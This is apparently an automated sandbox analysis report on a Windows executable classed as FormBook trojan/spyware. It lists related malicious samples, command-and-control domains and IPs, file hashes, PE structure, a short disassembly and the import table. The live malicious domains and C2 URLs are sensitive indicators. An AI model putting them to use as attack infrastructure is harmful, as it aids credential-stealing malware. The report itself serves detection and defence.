                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:2
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:1001-13.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@10/8
                                                    EGA Information:
                                                    • Successful, ratio: 75%
                                                    HCA Information:
                                                    • Successful, ratio: 96%
                                                    • Number of executed functions: 45
                                                    • Number of non-executed functions: 304
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                    • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 20.109.210.53
                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Execution Graph export aborted for target OlGIUOYUZW.exe, PID 6724 because it is empty
                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.21.16.1 | trow.exe | malicious | Unknown
• www.wifi4all.nl/
104.21.16.1 | 8L6MBxaJ2m.exe | malicious | FormBook
• www.rafconstrutora.online/0xli/
104.21.16.1 | NFhRxwbegd.exe | malicious | FormBook
• www.kkpmoneysocial.top/86am/
104.21.16.1 | JNKHlxGvw4.exe | malicious | DCRat, PureLog Stealer, zgRAT
• 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
47.83.1.90 | BDlwy8b7Km.exe | malicious | FormBook
• www.givvjn.info/wl3x/?94=IDH/sxYsqLulkbcslybjsGNv3NS6VvVpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeI9ZMZ+p0PiMQUF+eqUdc9aZVsWrUptbZMNnY=&TXVlY=nv6XU20pgPTDN0
47.83.1.90 | k9OEsV37GE.exe | malicious | FormBook
• www.dkeqqi.info/1dyw/?cNPH=r4IIUaGg8Ysw6Z88K77s9M2UXGNuluWHvSk1OgU5mSYSbSsTUuuLMPChZLQsUTMX5ns6JDTUfCzdkiOd4VeD2v0HOFU0ImfoMqjgmv5MAgVZY7DuZfSFf9DemTdSFvne3C9WyBVTb1Eg&EtJTX=_JVX4ryxDRQpLJF
47.83.1.90 | XeFYBYYj0w.exe | malicious | FormBook
• www.givvjn.info/wl3x/?9F=IDH/sxYsqLulkbctqSbdtx5w6svLFYBpNQ4SjbhBVw1Jeu7sJntH54CcC3lqE89WX7ek1cbvwkrNRP5o0zeIvIpAz78Fkv0uY+bcXdYna/YYRI4X4Lt1dDHtrJaiCZnHtgyfQjAASlTW&wtE0B=1LjxZz
47.83.1.90 | FG5wHs4fVX.exe | malicious | FormBook
• www.cloijz.info/r4db/
47.83.1.90 | KcSzB2IpP5.exe | malicious | FormBook
• www.ripbgs.info/mheu/?SDC=9Pe/ezeaWCrzUAPBTcNIGLUigJjsMNJlR4gH1LxCPe/+YeL0Jf302cRtfT27tJhwI3isQtUK9KovoI0NPjbFDyYPKZnOU02C1XybnvkdM/orYwcMtw==&mH=CpePy0P
47.83.1.90 | smQoKNkwB7.exe | malicious | FormBook
• www.cloijz.info/r4db/
47.83.1.90 | 1162-201.exe | malicious | FormBook
• www.ripbgs.info/hf4a/
47.83.1.90 | QUOTATION#050125.exe | malicious | FormBook
• www.givvjn.info/nkmx/
47.83.1.90 | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook
• www.givvjn.info/nkmx/
47.83.1.90 | QUOTATION#050125.exe | malicious | FormBook
• www.givvjn.info/nkmx/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.laduta.xyz | 1162-201.exe | malicious | FormBook
• 192.64.119.109
www.laduta.xyz | ORDER REF 47896798 PSMCO.exe | malicious | FormBook, PureLog Stealer
• 192.64.119.109
url.gname.net | 1162-201.exe | malicious | FormBook
• 172.65.235.97
www.explorevision.xyz | 1162-201.exe | malicious | FormBook
• 162.0.236.169
www.einpisalpace.shop | k9OEsV37GE.exe | malicious | FormBook
• 188.114.97.3
www.einpisalpace.shop | XeFYBYYj0w.exe | malicious | FormBook
• 188.114.96.3
www.einpisalpace.shop | gH3LlhcRzg.exe | malicious | FormBook
• 188.114.97.3
www.einpisalpace.shop | 1162-201.exe | malicious | FormBook
• 188.114.96.3
www.ripbgs.info | KcSzB2IpP5.exe | malicious | FormBook
• 47.83.1.90
www.ripbgs.info | 1162-201.exe | malicious | FormBook
• 47.83.1.90
www.babyzhibo.net | 1162-201.exe | malicious | FormBook
• 192.186.58.31
www.mzkd6gp5.top | qlG7x91YXH.exe | malicious | FormBook
• 104.21.80.1
www.mzkd6gp5.top | 1162-201.exe | malicious | FormBook
• 104.21.64.1
www.mzkd6gp5.top | QUOTATION#050125.exe | malicious | FormBook
• 104.21.32.1
www.mzkd6gp5.top | QUOTATION#070125-ELITE MARINE .exe | malicious | FormBook
• 104.21.96.1
www.mzkd6gp5.top | QUOTATION#050125.exe | malicious | FormBook
• 104.21.64.1
www.mzkd6gp5.top | CJE003889.exe | malicious | FormBook
• 172.67.158.81
                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    NAMECHEAP-NETUSQsBdpe1gK5.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                    • 199.192.23.123
                                                    rACq8Eaix6.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.23.123
                                                    plZuPtZoTk.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.21.169
                                                    5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                    • 199.192.23.123
                                                    5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.43.134
                                                    https://services221.com/mm/Get hashmaliciousHTMLPhisherBrowse
                                                    • 198.54.116.108
                                                    wWXR5js3k2.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.43.134
                                                    OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                    • 63.250.43.134
                                                    QmBbqpEHu0.exeGet hashmaliciousFormBookBrowse
                                                    • 199.193.6.134
                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                    • 162.0.236.169
                                                    CLOUDFLARENETUS24010-KAPSON.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                    • 104.21.32.1
                                                    https://file2-cdn.creality.com/file/2e068bd90e233501c8036fb25c76e092/CrealityScan_win_3.3.4-20241030.exeGet hashmaliciousUnknownBrowse
                                                    • 162.159.61.3
                                                    g4.elfGet hashmaliciousUnknownBrowse
                                                    • 1.1.1.1
                                                    msit.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 104.21.6.116
                                                    tesr.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 104.21.90.18
                                                    WSLRT.exeGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.134.197
                                                    msit.msiGet hashmaliciousLummaC StealerBrowse
                                                    • 172.67.134.197
                                                    Shipping Docs Waybill No 2009 xxxx 351.exeGet hashmaliciousAgentTeslaBrowse
                                                    • 104.26.13.205
                                                    trow.exeGet hashmaliciousUnknownBrowse
                                                    • 188.114.96.3
                                                    https://encryption-deme-group.lomiraxen.ru/PdoodjcL/#Mvercauteren.william@deme-group.comGet hashmaliciousUnknownBrowse
                                                    • 104.17.25.14
                                                    VODANETInternationalIP-BackboneofVodafoneDE6.elfGet hashmaliciousUnknownBrowse
                                                    • 92.73.125.182
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 47.82.15.239
                                                    res.arm5.elfGet hashmaliciousUnknownBrowse
                                                    • 84.61.102.254
                                                    res.x86.elfGet hashmaliciousUnknownBrowse
                                                    • 178.9.17.19
                                                    BDlwy8b7Km.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    6.elfGet hashmaliciousUnknownBrowse
                                                    • 82.82.131.16
                                                    FG5wHs4fVX.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                    • 47.83.1.90
                                                    No context
                                                    No context
Process: C:\Windows\SysWOW64\chkntfs.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1239949490932863
Encrypted: false
SSDEEP: 384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5: 271D5F995996735B01672CF227C81C17
SHA1: 7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256: 9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512: 62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious: false
Reputation: high, very likely benign file

Process: C:\Users\user\Desktop\1001-13.exe
File Type: data
Category: dropped
Size (bytes): 290816
Entropy (8bit): 7.991432774809332
Encrypted: true
SSDEEP: 6144:VvexgKz5BrOSqOkEJ7BKFsggYr7jhBelkb+:hwJ/cSBY7jhBa
MD5: C94164C81A8AC55916BD6D1D84948B6C
SHA1: 8FAA9CECF5CEA31E028C5AE0AD4D86E7B967EDB5
SHA-256: 38F77F4F4E09D5B315DBCF8305A481A4D8A05CC2953E8B31656ACE46B48C41EE
SHA-512: 23EF67F99545E9321D81A84F1EB3F8AFE077A166734CF81A345DBF76CB311DE530AD9D7739AFDD425FF938849A779D66C3A78192B0B541993A6322A391A60282
Malicious: false
Reputation: low

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.421135474135097
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: 1001-13.exe
File size: 1'616'384 bytes
MD5: a3356244cc31500c395570f65839865d
SHA1: 6dc52c136f3bf36f6addd123093cf9a1ce27c00f
SHA256: d2934dafa20010b814ef03d80e356d61ca23e54d1b6ec551d60bfe550c7dcd43
SHA512: aee36cda01756f1b4e66a6d2ecae15735df0ec4d7bf691e8e3f5a75ffc98e257cdeab2b9305a03caa1b05876e0a568433409795a65c5528198edbf039badef55
SSDEEP: 24576:6qDEvCTbMWu7rQYlBQcBiT6rprG8aL720azMMpPlCOmsUfk2QUw:6TvC/MTQYxsWR7aLpaRJ2QU
TLSH: AC75E00273C1C022FF9B91734F5AF6515ABC6A260523E62F13981DB9BE701B1563E7A3
File Content Preview: MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
Icon Hash: aaf3e3e3938382a0
Entrypoint: 0x420577
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x67817D4B [Fri Jan 10 20:04:27 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 948cc502fe9226992dce9417f952fce3

Instruction
call 00007FB4F51B6313h
jmp 00007FB4F51B5C1Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB4F51B5DFDh
mov dword ptr [esi], 0049FDF0h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FDF8h
mov dword ptr [ecx], 0049FDF0h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FB4F51B5DCAh
mov dword ptr [esi], 0049FE0Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE14h
mov dword ptr [ecx], 0049FE0Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FB4F51B89BDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDD0h
push eax
call 00007FB4F51B8A08h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDD0h
push eax
call 00007FB4F51B89F1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0xb3e18 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x188000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0xb3e18 | 0xb4000 | d6caf47d310df6ff9e8135786e08cfcf | False | 0.9632310655381945 | data | 7.962992737543316 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x188000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0xab0e0 | data | | | 1.0003154258963234
RT_GROUP_ICON | 0x187898 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x187910 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x187924 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x187938 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x18794c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x187a28 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
                                                    DLLImport
                                                    WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                                                    WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                                                    USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, 
GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll: GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll: EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll: GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll: GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll: DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll: CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll: CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken | Map
